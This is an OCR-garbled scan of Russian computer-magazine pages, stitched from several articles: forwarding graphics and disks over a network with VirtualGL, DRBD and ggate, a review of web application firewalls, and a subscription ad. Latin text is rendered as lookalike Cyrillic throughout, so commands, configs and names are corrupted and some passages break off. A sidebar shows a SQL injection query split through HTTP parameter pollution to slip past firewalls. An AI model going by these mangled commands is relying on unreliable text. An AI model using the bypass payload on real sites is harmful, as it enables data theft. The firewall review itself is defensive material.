-сопб^ +5 +Т -1: 

Далее запускай заново Х.огд и возвращайся на локальную 
машину: 

$ зисіо /е1:с/іпі1:.сІ/§сІт з1:аг1: 

Теперь можно подключиться к серверу и запустить нужное при- 
ложение: 

$ ѵ§1соппес1: изег@сервер 
$ ѵ§1гип /изг/Ьіп/хопо1:іс 

На стандартных настройках картинка будет, скорее всего, тор- 
мозить, но, если немного убавить качество, можно добиться вполне 
приемлемых результатов. Например, следующая команда создаст 
подключение к серверу со сжатием картинки в формате ^РЕ6, 
качеством 40 и частотой кадров 25: 

$ ѵ§1гип -пр 2 -с зре§ -д 40 -затр 1 -Трз 25 приложение 

Таких настроек с лихвой хватит для вполне комфортной игры 
на 10-мегабитном канале. Кстати, на диске ты найдешь скрипт 
ѵдІ.зЬ, с помощью которого можно автоматически подключаться 
к нужному серверу (причем даже в том случае, если ты находишься 
за МАТ'ом) и выполнять проброс аудиопотока со сжатием в МРЗ 
(как было показано ранее). Достаточно прописать в начале сце- 
нария нужного юзера и адрес сервера (переменные изег и зегѵег). 
После запуска сервера останется только выполнить команду 
ѵдігип, и ты получишь картинку и звук. 



$ зисіо /е1:с/іпі1:.сІ/55ІісІ гез1:аг1: 

А затем просто подключиться к серверу с помощью 55Н, не за- 
быв указать имя запускаемого приложения: 

$ 55І1 -X изег@сервер 'сііготіит' 

Задействовав этот метод передачи картинки вместе с пере- 
дачей аудио, можно вполне комфортно выполнять обычную 



диски 



с пробросом дисковых накопителей по сети все намного сложнее. 
Дело в том, что, несмотря на существование способов проброса 
диска или раздела на другую машину, его все равно нельзя будет 
использовать с обеих машин одновременно из-за рассинхрониза- 
ции метаданных файловой системы. Чтобы этого избежать, можно 
использовать кластерные файловые системы, в которых применя- 
ется множество различных блокировок и методов синхронизации, 
но легче воспользоваться сетевыми файловыми системами, типа 
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Искусство сопряжения 



. .. Сгеаііпд /е1с/тосІргоЬе.сІ/ѵіг1иа1д1 .соп'Г зе( гедиезіесі регшіззіопз ^ог /сіеѵ/пѵісііа* ... 
. .. Нііетрііпд Іо гешоѵе пѵісііа ілосіиіе ~Ггоіп ілетогд зо сіеѵісе регшіззіопз шіП Ье геіоасіесі ... 
. бгапііпд ыгііе регшіззіоп іо /сІеѵ/пѵісІіаѲ /сіеѵ/пѵісііасіі іог а11 изегз ... 

. .. Могіііуіпд /еІс/Х11/хогд.сопі іо епаЫе ОРІ регшіззіопз іог аіі изегз ... 

. .. Нсісііпд ХІ103І +10СРІІ: іо /еіс/дсІш/Іпіі/ОеіаиІі зсгірі ... 



Конфигуратор Ѵігіиаібі в работе 



МР5 или СІР5 (5атЬа), для удобного доступа к удаленным данным, 
но об этом уже немало написано. Я же хочу предложить простой 
способ экспорта дискового девайса, он широко применяется 
в серверах, но незаслуженно забыт обычными пользователями. 

В Ыпих такой экспорт можно осуществить с помощью драйвера 
ОРВО (ОізІгіЬиІесІ Реріісаіесі ВІоск Оеѵісе), позволяющего отзерка- 
лить диск/раздел на удаленную машину так, что все записываемые 
данные будут мгновенно попадать на диски/разделы обеих машин. 
Для его настройки создаем файл /ек/сІгЬсІ.сопІ': 

$ 5ис1о ѵі /еѣс/сІгЬсІ.согтР 

§1оЬа1 { и5а§е-соип1: по; } 
соттоп { зупсег { га1:е 100М; } } 
гезоигсе г0 { 

ргоііосоі С; 



5І;аг1;ир { 

ы-Рс-1:ітеои1: 15; 

Іе&г_-ѵ\|1^с-_1:Атери'б 60_;„ 

} 



пе1: { 

сгаш-іітас-аі^ зііаі: 
5ІіагесІ-5есге1: "ПАРОЛЬ"; 

} 



оп посіеі { 

сіеѵісе /сІеѵ/сІгЬсІ0: 

сіізк /сіеѵ/5сіа5: 

асІсІгезБ 192.168.0.1:7788; 
теіа-сіізк іітіетаі; 

} 



оп посІе2 { 

сіеѵісе /сІеѵ/сІгЬсІ0: 

сіізк /сІеѵ/5СІа7: 

асІсІгезБ 192.168.0.2:7788; 

те1:а-сІІ5к іпііегпаі: 

} 

} 



ПОЛЕЗНЫЕ МЕЛОЧИ 



Слинковать два СОМ-порта на одной машине можно с помощью 
утилиты зосаі: 

$ зисіо зосаі /сіеѵ/1;1;у50^ гаы^ес1іо=0д сгпі ^ 

/сIеѵ/1;1;у51^ гаы^есI^о=0^ сгпі 



Расшаренные с помощью изЬір устройства можно подключить 
также и в ѴѴіпсІоѵѵз: 

% изЬір.ехе -1 192.168.0.101 
% изЬір.ехе -а 192.168.0.101 1-2.2 



где в опциях сіізк раздела оп побеХ указываем имя дискового на- 
копителя / раздела на обеих машинах (разделы следует создать 
заранее, но они необязательно должны быть равны по размеру), 
а сразу после него прописываем ІР-адрес машины. Далее копируем 
файл на обе машины и устанавливаем пакет сІгЬсІВ-иЫз. Также 
на обеих машинах запускаем инициализацию хранилища: 

$ зисіо сІгЬсІасІт сгеаіе-тсі с1гЬс10 

и стартуем демон ОРВО: 

$ зисіо /еіс/іпіі.сІ/сІгЬсІ зіагі 

Далее переходим на ту машину, которая будет работать с дан- 
ными (одновременный доступ к хранилищу может получить только 
одна из них), и делаем ее мастером: 

$ зисіо сІгЬсІасІт ргітагу а11 

Все, теперь в хранилище можно создать файловую систему 
и смонтировать ее: 

$ зисіо тк-Рз.ех1;4 /сІеѵ/сІгЬсІ0 
$ зисіо тоипі; /сІеѵ/сІгЬсІ0 /тп1: 

По сути, мы получили сетевой РАЮ-массив, доступ к которо- 
му может иметь только один хост. Однако, если тебе потребуется 
получить доступ к данным с другой машины, достаточно просто 
размонтировать файловую систему на текущем мастере, сделать 
вторую машину мастером и смонтировать хранилище на ней. Все 
это делается с помощью трех элементарных команд. 

Если же речь идет о РгееВВО, то здесь вообще не придется за- 
морачиваться с РАЮ-массивами, а можно просто экспортировать 
диск на другую машину с помощью 6Е0М-класса ддаіе. На машине- 
сервере создаем файл /ек/дд.ехрогіз и пишем в него следующую 
строку: 

$ зисіо ѵі /еіс/^^.ехрогіз 
192.168.1.0/24 КІЛІ /сІеѵ/сІа0з4сІ 

где первое поле — это подсеть, которой разрешен доступ к диску, 
второе — режим экспорта (РѴѴ — чтение/запись), третье — имя 
диска/раздела. Далее запускаем демон ддаіесі с помощью одно- 
именной команды, затем переходим на машину-приемник (клиент), 
подключаем и монтируем диск: 

$ зисіо §§а1:ес сгеаіе -о гы 192.168.1.1 /сІеѵ/сІа0з4сІ 
$ тоипі; /сіеѵ/§§а1;е0 /тпі 

Это все. Опять же получить доступ к диску одновременно смо- 
жет только одна машина. 



выводы 



Сегодня в *піх доступно большое количество средств проброса 
самого разного оборудования по сети, и если такая потреб- 
ность возникает, ее всегда можно удовлетворить. Это делается 
не так красиво, как в РІап 9, да и без «костылей» порой не обой- 
тись, но все работает, и работает достаточно гладко. ^ 
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5УМ/АСК 



Сергей Яремчук (дгіпсіеггазупаскти), Мартин Пранкевич (тагііпйзупаск.ги) 
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ЗНАКОМИМСЯ 

с возможностями 

ТЮЯУЛЯ РНЫХ 

К^Е&АРРИСАТЮН^ 

ПЯЕ^ѴАІІЗ 



Больши нст во онлайн-проектов стр оится на оіснове І 

динамических веб-пр^ложениР|, котіорые со временем 
обрастаЬ^новыми функциями-И-гштіутно становятся более 
сложными в разработке. Отсутствие единых стандартов 

и появлению серьезнніх уязвимостей в веб-сфрвисах. 

Здесь ні помощь приходят межсетевые зікраны, которое 
фильтруют веб-трафик на прикладном уровкё. ! ^ 
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ІМРЕРѴА5ЕСУРЕ5РНЕРЕ _ 

ѴѴЕВ АРРЫСАТІОМ РІРЕѴѴАІІ| 

Компания Ітрегѵа ( ітрегѵа.сопп ) предлагает два варианта ѴѴАР: 
традиционные аппаратные решения (линейка 5есиге5рЬеге ѴѴАР) 
и специальный 5аа5-сервис (Ітрегѵа СІоисІ ѴѴАР). Построены они 
на одном ядре, а потому их функционал схож и обеспечивает за- 
щиту от 501 Іщесііоп, Х55, С5РР, атак на переполнение буфера, 
червей и вирусов, направленных на серверное ПО и приложения. 
Оба удовлетворяют требованиям РСІ 055 6.6 (см. соответствующую 
врезку). Единственное отличие состоит в том, что СІоиб ѴѴАР ориен- 
тирован на быстрое внедрение, не требует покупки оборудования 
и прочих первоначальных затрат, а плата берется за услугу. Чтобы 
перенаправить трафик, достаточно подписать договор и изменить 
настройки 0М5-сервера. Однако есть ограничения по скорости: 
максимально до 100 Мбит/с (чего часто хватает), тогда как аппарат- 
ная реализация поддерживает до 2 Гбит/с и рассчитана на средних 
и крупных провайдеров. 

Оба решения сочетают в себе систему автоматического об- 
учения и определения приложений, защиту, основанную на репу- 
тации, а также специальные сигнатуры и политики (АбѵапсесІ ѴѴеЬ 
Роіісіез), позволяющие точно определить и блокировать атаку. 
Основу сигнатур составляют наработки ІР5 5пог1 и собственные 
сигнатуры, разрабатываемые центром АОС (Арріісаііоп ОеІ^епзе 
Сепіег), который принадлежит Ітрегѵа, в его задачи входит анализ 
отчетов Видігар, СѴЕ и постов на хакерских форумах. 

Система динамического профилирования (ѴѴеЬ Оупатіс 
РгоПІіпд) — ключевая технология Ітрегѵа ѴѴАР — автоматически 
создает профили различных веб-приложений и поведения поль- 
зователей (аналог белых списков) и обнаруживает вредоносный 
трафик, сравнивая текущие запросы с данными профиля. Наличие 
ѴѴОР избавляет админа от «ручной доводки» параметров. При по- 
мощи ТЬгеаіРасІаг РгаисІ Ргеѵепііоп 5егѵісез блокируются фишинго- 
вые сайты. Специальный сервис репутации ТЬгеаіРасІаг Рериіаііоп 
Еегѵісез умеет автоматически распознавать бот-сети и блокиро- 
вать источники вредоносного трафика, определяет и анализирует 
трафик, идущий с Тог, выявляет анонимайзеров и геонарушителей. 
Чтобы обнаружить сложные атаки, применяется корреляция со- 
бранной информации (технология Соггеіаіеб Аиаск Ѵаіісіаііоп). 

Для построения правил защиты сети возможно использование 
данных внешнего аудита, которые получены одним из сканеров 
безопасности (поддерживается более десятка). Встроенный бранд- 
мауэр позволяет блокировать атаки на сетевом уровне. 

Устройства 5есиге5рЬеге ѴѴАР могут быть развернуты в двух 
режимах: іп-Ііпе (ігапзрагепі Ьгісіде, геѵегзе ргоху) или оІ^Ніпе (как 
сетевой монитор). За счет функции Тгапзрагепі Іпзресііоп, фирмен- 
ной технологии ІМРѴНА (переключение в кластере за менее чем 
1 мс), применения отказоустойчивых интерфейсов и поддержки 
сетевых протоколов ѴРРР и 5ТР/Р5ТР обеспечивается высокая 
производительность и доступность. 

Для администрирования нескольких устройств 5есиге5рЬеге 
ѴѴАР требуется сервер централизованного управления 



ЧТО ЗА ЗВЕРЬ РСІ 055? 



Стандарт безопасности данных индустрии платежных карт (Рау- 
теп* СагсІ Іпсіизігу Оаіа Зесигііу ЗіапсІагсІ, РСІ 055) является 
руководством для предприятий, которое описывает необходимые 
меры обеспечения безопасности информации о держателях 
платежных карт и методы их защиты от возможных взломов. 

В настоящее время актуальна версия 2.0, к которой выпущено 
несколько дополнительных требований. Требование 6.6 говорит 
о необходимости использования ѴѴАР ( доо.дІ/тПОР ). 




Ітрегѵа СІоисІ ѴѴАР реализован в виде 5аа5 



5есиге5рЬеге МХ Мападетепі 5егѵег. Интерфейс в реальном вре- 
мени показывает происходящие события и информирует об уровне 
угроз. Администратор также получает доступ к базе самых раз- 
нообразных отчетов, предусмотренных требованиями стандартов 
информационной безопасности, с возможностью создавать свои 
отчеты и экспортировать результат в разные форматы. Отчеты 
могут генерироваться по запросу или автоматически отсылаться 
на е-таіі по установленному графику. 

^АРРАСиОАѴѴЕВАРРиСАТІОМ РІРЕѴѴАИ 

Разработка Ваггасисіа Меіѵѵогкз Іпс. ( Ьаггасисіапеіѵѵогкз.сот ) 
позволяет не только защитить веб-приложения от сетевых атак, 
но и увеличить масштабируемость и производительность веб- 
сервисов. Для защищаемого ресурса Ваггасисіа ѴѴеЬ АррІісаЬоп 
РігеѵѵаІІ работает в качестве реверс-прокси и предлагает все 
возможности, необходимые для обеспечения безопасности 
и управления корпоративными приложениями, защищая от 501 
Іп)есІіоп, Х55, С5РР, атак на переполнение буфера и других, 
а также «скрывает» используемое приложение, усложняя атаку. 
После подключения к сети Ваггасисіа создает адаптивный про- 
филь приложения, который затем используется для обнаружения 
атак, в том числе и О-бау. Администраторы могут самостоятельно 
создавать ѵѵЬіІеІізІ-правила для некоторых элементов сайта, про- 
сто отбирая в консоли соответствующий трафик. Специальный 
движок ХМЕ РігеѵѵаІІ проверяет трафик приложений, использующих 
ХМЕ, обеспечивая защиту от специфических атак (ѴѴ50Е роізопіпд, 
Ресигзіѵе Раззіпд, НідЫу пезіеб еіетепіз и других). Возможна 
проверка исходящего трафика на наличие конфиденциальной ин- 
формации. В продукт заложены паттерны, которые обеспечивают 
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Консоль системных настроек Ваггасисіа ѴѴеЬ Арріісаііоп РігеѵѵаІІ 

обнаружение номеров кредитных карт и социального обеспечения 
(ЗосіаІ Зесигііу питЬегз, используются в США и некоторых других 
странах). При необходимости легко создать свои шаблоны. Предус- 
мотрен контроль загружаемых файлов и проверка их антивирусом. 

Обеспечивается функция ІАМ (Ібепіііу апб Ассезз Мападетепі), 
реализующая в том числе одноразовую аутентификацию на сер- 
висах сети (550, 5іпдІе 5ідп-0п), которые поддерживают двухфак- 
торную аутентификацию при помощи клиентских сертификатов 
или токенов. Предложена интеграция с большим числом ЮАР/ 
РА0105-сервисов, включая Асііѵе Оігесіогу. Администратор может 
управлять политиками доступа пользователей к разным сервисам. 
Поддерживается 551, кеширование трафика, балансировка 14/17- 
нагрузки и НА-кластеры, компрессия трафика на лету. Управление 
производится при помощи понятного веб-интерфейса, в перво- 
начальных настройках помогают предустановленные политики. 
Предоставляются разнообразные отчеты и мониторинг в реальном 
времени. 

Разработчик предлагает Ваггасисіа ѴѴАР в виде готовых 
устройств или образа для виртуальных машин (ѴМѵѵаге Е5ХІ/ 
РІауег/5егѵег, ѴігШаІВох, Сіігіх Хеп5егѵег). Обе реализации имеют 
несколько вариантов, они отличаются функциональностью и про- 
изводительностью. Для установки в ѴМ требуется виртуальная ма- 
шина с 512 Мб ОЗУ и 50 Гб места на харде. Основой Ваггасисіа ѴѴАР 
является Ыпих и программное обеспечение со свободной лицензи- 
ей — АрасЬе, Му501, СІатАѴ и прочее. Дистрибутив максимально 
упрощен, поэтому особых навыков не требует. Настройка самой 
системы производится при помощи специального меню, в дальней- 
шем помогает веб-интерфейс (порт 8000). 

РОРТІѴѴЕВ ѴѴЕВ АРРЫСАТІОМ 5ЕСУРІТУ 

Семейство ѴѴАР-устройств от компании Рогііпеі ( І^огІіпеГсопп ) 
предназначено для защиты веб- и ХМІ-приложений, обеспечивает 
балансировку и ускорение обмена информацией между веб- 
приложением и базой данных. Решения ориентированы на средние 
и большие компании, провайдеров сервисов приложений и облач- 
ных гигантов. Полностью соответствуют требованиям РСІ 055 6.6, 
защищая в том числе от уязвимостей, входящих в десятку по вер- 
сии 0ѴѴА5Р. Устройства прошли сертификацию ІС5А ѴѴеЬ Арріісаііоп 
РігеѵѵаІІ. Обеспечивается распознавание и блокировка всех угроз: 
Х55-атак, 501 Іщесііоп, переполнения буфера, включения файлов, 
Соокіе Роізопіпд, 005 и других. Защита базируется на сопостав- 
лении трафика по сигнатурам и шаблонам, оценке параметров 
на соответствие НТТР РРС, пороговых значениях, самообучении, 
управлении сессиями и некоторыми другими приемами. Авто- 
матически создаются профили действий пользователя, которые 



Ваггасисіа ѴѴАР доступна и в виде образа виртуальной машины 

затем сопоставляются с трафиком. Защита ХМІ обеспечивается 
при помощи ХМІ ІР5, проверки схем и ѴѴ501, ограничений ХМІ- 
выражений. Также предусмотрена защита от дефейса веб-страниц: 
приложения отслеживаются на наличие модификаций, и в случае 
взлома происходит автоматический откат к исходному состоянию. 
Функция ОІР предотвращает кражу личной информации и кредит- 
ных карт. Поддерживается несколько режимов работы, позволяю- 
щих легко вписаться в сетевую среду: в разрыв (Іпііпе Тгапзрагепі), 
прозрачный прокси (Тгапзрагепі Ргоху), обратный прокси (Реѵегзе 
Ргоху), офлайн-защита (ОІ^Ліпе Ргоіесііоп). Кроме собственно 
брандмауэра, РогІіѴѴеЬ предоставляет возможности сканера уязви- 
мостей (ѴиІпегаЫІіІу 5саппег). 

На всех устройствах РогІіѴѴеЬ установлена операционная 
система РогІіѴѴеЬ/РогІіОЗ с усовершенствованными функциями 
регистрации событий и формирования отчетности, улучшенной 
безопасностью и упрощенными процедурами конфигурации. Также 
применены свои препроцессоры РогІіА5ІС, ускоряющие обработку 
определенных типов данных (сеть, контент, зесигііу). В частно- 
сти, параллельная обработка 551 и зашифрованных ХМР-данных 
ускоряет транзакции, снижает нагрузку и требования к мощности 
сервера. Предусмотрена балансировка нагрузки между сервера- 
ми, синхронизация конфигурации, маршрутизация, основанная 
на контенте (сопІепІ-ЬазесІ гоиііпд), что также увеличивает ско- 
рость работы приложений и оптимизирует потребление серверных 
ресурсов. 

Модельный ряд представлен четырьмя устройствами и вирту- 
альным образом для ѴМѵѵаге Р5Хі. Интерфейс интуитивно понятен, 
информация отображается в реальном времени, позволяя оценить 
подключения к приложению по нескольким векторам, в том числе 
геоданным. Устройства от Рогііпеі традиционно считаются одними 
из самых простых во внедрении. 

АОТРОМІХѴѴЕВКМЮНІ^ 

АОТРОМІХ ѴѴеЬКпідЫ ( адігопіх.сот ) — это фильтр І5АРІ (Іпіегпеі 
5егѵег АРІ) для 115, блокирующий определенные запросы. По по- 
пулярности среди опенсорсных решений данная реализация 
уступает лишь МосІ5есигіІу. Тесная интеграция с веб-сервером 
позволяет анализировать трафик (в том числе защищенный) 
более продуктивно. Совместим с такими популярными приложе- 
ниями, какѴѴеЬОАѴ, РІазЬ, СоІсІ Ризіоп, ОиІІоок ѴѴеЬ/МоЫІе Ассезз, 
5ЬагеРоіпІ и другие. Может быть настроен для защиты сторонних 
приложений и веб-серверов. Все обращения к серверу обрабаты- 
ваются правилами фильтрации, устанавливаемыми администра- 
тором. Причем в правилах не используются известные сигнатуры 
атак, требующие обновления, вместо этого применены фильтры. 
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МЕТОДЫ ОБХОДА ѴѴАР 



Несмотря наточтоѴѴАР'ы вполне способны защитить от большинства 
целевыхатак, они далеко не идеальны, и подготовленныйзл оу мыш- 
лении к вполне способен обойти та кой бастион. Создать идеальный 
набор рулесетов, описывающих все атаки, довольно сложно, а НТТР- 
запросы могутприниматьбольшоеколичествоформ. Поэтомучасто 
причиной обхода ѴѴАР становятся сами правила, для чего достаточно 
чуть изменить запрос, закодировав его часть ил и добавив несуще- 
ственные сим волы. Один из простых и эффективных методов получил 
название НТТРРагатеІегРоІІиІіоп ( доо.дІ/ѵсІѵѵЬО І. Идея заключается 
всмешивании параметровзапроса, когда пододним параметром пере- 
дается несколько значений. Так, следующий запрос будет блокирован 
большинствомѴѴАР: 

Іі1:1:р://ыыы.ехатр1е.сот/5еагсІі.а5рх?д=5е1ес1: 

паше.раззыогсі -Ргош изегз 

Но стоитего немного изменить, ион пройдет: 

Іі1:1:р://ыыы.ехатр1е.сот/5еагсІі.а5рх?д=5е1ес1: <-■ 

пате&д=ра55ыогс1 -Ргош изегз 

Один из вариантов атаки — использовать в запросе комментарии 
/* ... */, которые игнорируются движком, но попадают в 501-запрос, 
позволяя провести полноценнуюЗОІ-инъекцию. Естьидругиеметоды 
обхода ѴѴАР, в том числе и направленные на сам ѴѴАР. Конечно, разработ- 
чики таких файеров не стоят на месте и обновляют свои правила, но всех 
вариантов не предусмотришь. 
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РогІіѴѴеЬ ѴѴеЬ Арріісаііоп 5есигі(у представлен серией из четырех устройств 



позволяющие определить 005-атаки, Х55-атаки, 501 іщесііоп, пе- 
реполнения буфера, попытку подбора паролей. Все заблокирован- 
ные запросы автоматически регистрируются для их последующего 
анализа. При необходимости можно активировать журналирование 
разрешенных запросов (полезно на этапе первоначальной на- 
стройки). Кроме того, ѴѴеЬКпідЫ может использоваться для отлова 
НТТР-ошибок веб-сервера, которые помогают не только опре- 
делить начало атак, но и выявить ошибки выполнения скриптов 
и битые ссылки. Возможна блокировка ІІРІ, содержащих ссылки 
для загрузки определенных типов файлов. Запросы и заголовки 
могут проверяться на соответствие РРС. 

Установка ѴѴеЬКпідЫ не сложнее установки любой программы 
ѴѴіпсІоѵѵз, возможно удаленное развертывание. В поставку входит 
анализатор журналов и конфигуратор. Управление производится 
при помощи понятного 6Ш. Перезагрузка веб-сервера не требу- 
ется. Аналогично на лету подхватываются все новые изменения 
(пересчитываются раз в одну минуту). 

6^АР^IАNга^^МРЕР2.NЕТ' 

биагсПапЙЛІМРЕР^.МЕТ ( аиагсІіап.]иппрег 2 .пе^ ) — еще один ѴѴАР 
с открытым исходным кодом (ЗМи 6РЕ), работающий как обратный 
прокси. Написан на ^аѵа и функционирует как отдельное прило- 
жение, не связанное с конкретным сервером. В процессе работы 
анализирует входящие и исходящие НТТР/НТТР5-соединения, 
сравнивая проходящие данные с набором предопределенных 
правил. Если они совпадут, соединение разрывается. Платинная 
система позволяет нарастить функциональность. В поставку вклю- 
чены десять плагинов, анализирующих определенный тип трафи- 
ка. Контроль исходящего трафика позволяет отслеживать ответы 
сервера, обнаруживать искажения страниц, утечку информации 
и прочее. Правила представляют собой набор регулярных выра- 
жений, причем одно правило может включать паттерны из других. 



Кроме блокировки в правилах, можно выполнять определенную 
команду. Чтобы не контролировать весь трафик, предусмотрен 
список белых ІР. Настраивается все правкой параметров в девяти 
конфигах (параметров внутри немного, и они понятны). Мониторинг 
подключений ведется в веб-консоли. 

СІТРІХ МЕТ5СА1ЕР АРРЫСАТІОМ РІРЕѴѴАИ, 

Компания Сіігіх, в арсенале которой имеются веб-приложения 
и средства для организации облачных сервисов, предлагает 
свой вариант защиты — Меі5саІег Арріісаііоп РігеѵѵаІІ (МАР, доо. 
дІ/гТ^оп ). Продукт предлагается в виде отдельного устройства 
или виртуальной машины (Меі5саІег ѴРХ) для работы в Хеп5егѵег, 
Нурег-Ѵ или ѴМѵѵаге. В основе лежит аппаратная платформа Сіігіх 
Меі5саІег МРХ, поддерживающая ускорение работы приложений 
и балансировку нагрузки. Линейка содержит несколько решений, 
обеспечивающих скорость от 10 Мб/с до нескольких гигабайт в се- 
кунду, что позволяет выбрать наиболее подходящее для конкрет- 
ного предприятия. Появление МАР в сети полностью прозрачно 
и не требует перестройки существующей инфраструктуры. Трафик 
анализируется в обоих направлениях, поддерживается 551. Сразу 
после установки МАР задействует для проверки трафика сигна- 
туры известных атак, определяет характер приложения и выдает 
рекомендации по усилению политик безопасности. В решении 
используется модель защиты под названием РозіЛѵе 5есигі1у 
МобеІ, которая разрешает доступ только к корректно работающим 
приложениям без необходимости постоянного обновления сигна- 
тур. Если поведение веб-приложения выходит за принятые рамки, 
такие действия автоматически считаются потенциально опасными 
и блокируются. Кроме «стандартных» атак типа С55, 501 ІщесЛоп, 
переполнения буфера, поддерживается расширенный контроль 
и защита ХМЕ: проверка схемы и контроль формата для пра- 
вильности проверки данных, проверка прикрепленных файлов 
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И другие. Также обеспечивается защита от кражи конфиденциаль- 
ной информации. Поддерживается сжатие, кеширование, 14 — 17 
балансировка нагрузки, протоколы динамической маршрутизации 
и многие другие функции. Продукт сертифицирован ІС5А. Управле- 
ние производится при помощи понятной веб-консоли. 

ЗТІМбРАУАРРЫСАТІОМ РІРЕѴѴАИ 

Появление облачных сервисов привело к необходимости создания 
абсолютно нового класса продуктов — сІѴѴАР (ОізІгіЬиІесІ ѴѴАР). 
Такие решения призваны обеспечить защиту веб-приложений 
в распределенной среде, ведь на одном сервере сегодня может 
работать несколько сотен виртуальных машин, которые поддержи- 
вают функционирование несколько тысяч веб-сайтов. Настраивать 
персонально для каждого веб-сайта ѴѴАР проблематично, да и не- 
целесообразно, ведь ѴМ могут переезжать с хоста на хост. Управ- 
лять таким количеством ѴѴАР будет неудобно. В отличие от СІоиб 



Настройка базы АОТРОНІХ ѴѴеЬКпідЫ 



ѴѴАР, представляющих собой ѴѴАР, реализованные в виде сервиса, 
СІѴѴАР имеют принципиально другую архитектуру, где монолитное 
решение заменено модулями, которые устанавливаются на класте- 
рах и ѴМ, управление ведется из единой консоли. 

Примером СІѴѴАР может служить РіѵегЬесІ Зііпдгау Арріісаііоп 
РігеѵѵаІІ ( доо.дІ/1ѵѵР25 ). состоящий из трех модулей: Оесісіег 
Мосіиіез (применяет политики, устанавливается на кластер), 
Еп^огсег РІидіпз (пересылка трафика, идущего на веб-сервер, 
на Оесісіег Мосіиіез) и сервера администрирования, обеспечиваю- 
щего управление политиками. Поддерживается блокировка всех 
известных и неизвестных видов атак при помощи обновляемых 
правил, интеллектуальное обучение, аудит конфигурации и откат. 
Предусмотрен запуск части правил в режиме обнаружения без бло- 
кировки трафика, режим эксперта для тонкой подстройки политик. 
Реализованы и такие специфические функции, как 550, безопас- 
ное управление сессиями, ОРІ-епсгурІіоп. ^ 



ОПЕНСОРСНЫЕ ѴѴАР М005ЕСУРІТУ И ІРОЫВЕЕ 



Популярный ѴѴАР, созданный Иваном Ристиком в 2003 году, 
распространяется с исходным кодом по условиям А51ѵ2. 
Использование МосІЗесигіІу ( тосІБесигИу.огд ) прозрачно, 
установка не требует изменения настройки сервисов и сетевой 
топологии. Трафик проверяется на основе правил, которые 
описываются при помощи гибкого языка. В настоящее 
время проект предлагает как бесплатные Соге Риіез (СР5), 
так и коммерческие правила, разрабатываемые Тгизіѵѵаѵе 
ВрісІегІаЬз ( ѵѵѵѵѵѵ.ІгизІѵѵаѵе.сопп/зрісІегІаЬБ ). Правила СР5 
разрабатываются под руководством 0ѴѴА5Р ( оѵѵаБр.огд І 
и реализуют общую защиту веб-сервисов, обеспечивая 
контроль НТТР-заголовков, выявляя аномальность 
и соответствие требованиям, обнаруживают попытки 
сканирования, обращения к бэкдорам. Правила периодически 
можно обновлять через сервис РиІеБ ЗиЬвсгірІіоп 5егѵісе. 
Возможна проверка файлов при помощи СІатАѴ. Синтаксис 
понятен, и при обнаружении проблемного места создать 
новое правило, блокирующее уязвимость, очень легко. 

Именно поэтому МосІЗесигіІу идеально подходит для защиты 
веб-сервисов от известных и неизвестных атак. Изначально 
предусматривалось устанавливать его как модуль веб- 



сервера АрасИе, предназначенный для защиты собственно 
веб-сервера, или как реверс-прокси. Но затем была создана 
автономная версия МосІБесигіІу, которую можно использовать 
для защиты любого веб-приложения. Недавно анонсированы 
плагины, поддерживающие 115 и пдіпх. И хотя они находятся 
в состоянии тестирования, плагины вполне пригодны 
к использованию. Также за время своего развития проект 
оброс разработанными третьими лицами инструментами, 
которые упрощают редактирование правил, анализ логов 
и аудит. 

Проект ІгопВее ( ігопЬее.сот ). созданный тем же Иваном 
Ристиком, впервые был представлен почти два года назад 
на конференции Р5А в Сан-Франциско. Идея проекта проста: 
используя опыт, накопленный при разработке МосІЗесигіІу, 
создать новый продукт, лишенный отдельных недостатков 
прародителя (в первую очередь привязку к АрасИе), а также 
обладающий полноценной модульной поддержкой. Ядро 
продукта использует библиотеку ІіЬЫр, обеспечивающую 
парсинг НТТР (в настоящее время лицензия ІіЬЫр изменена 
на 650). Модули сбора данных и взаимодействия с хостом 
разделены. 



ІМРО 

Консорциум ѴѴА5С 
(ѴѴеЬ Арріісабоп 
ЗесигНу Сопзогііит, 
уѵеЬарраес.огаІ — 
некоммерческая ор- 
ганизация, в задачи 
которой входит сбор 
информации по без- 
опасности веб- 
приложений, обмен 
этой информацией, 
а также разработка 
соответствующих 
рекомендаций. 



ѴѴѴѴ^ 

Методика те- 
стирования ѴѴАР 
отѴѴеЬ Арріісабоп 
ЗесигНу Сопзогііит: 
ѵѵеЬаррвес.ога/ 
р^о^ес^5/ѵѵа^ес . 
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166 рублей 
за номер! 



Нас часто спрашивают: «В чем преимущество подписки?» 

Во-первых,это выгодно. Потерявшиесовесть распространители не 
стесняются продаватьжурнал за 300 рублей и выше. Во-вторых, это 
удобно. Не надо искатьжурнал в продаже и бояться проморгать момент, 
когда весьтиражуже разберут. В-третьих, это шанс выиграть одну из 20 
лицензий на новую версию словаря АВВУУІіпдѵоХб «Английский язык. 
Профессиональная версия»! 




ценА;2 



аіалварьдля 

ПРОМЫШЛЕННОЙ 

автоматики 



стлтьк/м^п 



ОПЕРАЦИОНКА 

ОТЛАБОРАТОРт 

ХОПЕРСКОГО 



іШРВЬЮ 

ССОЗДАТЕЛт 

ШШШІОСА 



ПОДПИСКА 

6 месяцев 1110 р. 
12 месяцев 1999 р. 




ПОДАРОК 



СЛОВАРИ 



Более 4 100 000 словарных статей 

Иллюстрации 

Упражнения 

Видеоуроки 




Из новыхвозможностей программы: 
ещебольшеавторитетныхсловарей, 
обновленное приложение АВВУУТиІог, 
примеры писем, иллюстрации и видео- 
уроки, перевод по наведению на слова в 
РВР-файлах, ЛазИ-роликах, в субтитрах 
кфильмам и многоедругое. 

Первые 20 читателей, оформившие 
годовую подписку в период с 29 ноября 
по 10 декабря, получатвподароклицен- 
зиюнаАВВУУІіпдѵоХб «Английский 
язык. Профессиональная версия».Полу- 
чить приз можно будетпо электронной 
почте. Оформить подписку можно 
за пару минутна сайте Ьир://5Ііор.дІс.ги. 



ЬНрѴ/зЬор.аІс.ги 



Ѵ/5А в # Й О 



8 (800) 200-3-999 (бесплатно) 
зиЬзсгіЬеОдІс.гц 
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Сергей Яремчук (дгіпсіеггазупаск.ги) 





внизу окна), и можно просмотреть, как в следующий раз автомати- 
зировать ту или иную операцию при помощи скриптов. Все мастеры 
по окончании работы позволяют сохранить результирующий 
Р5-скрипт, что очень кстати, ведь их не нужно будет писать с нуля 
самостоятельно, лишь адаптировать под свои нужды, подправив 
пару параметров. Модуль Асііѵе Оігесіогу для РоѵѵегЗЬеІІ включает 
в себя новые командлеты для управления топологией репликации, 
динамическим контролем доступа, тестированием и другими опера- 
циями. Акцент на развитие Р5 очевиден, по мере роста потребности 
в распределенных вычислениях требуется гибкий, удобный единый 
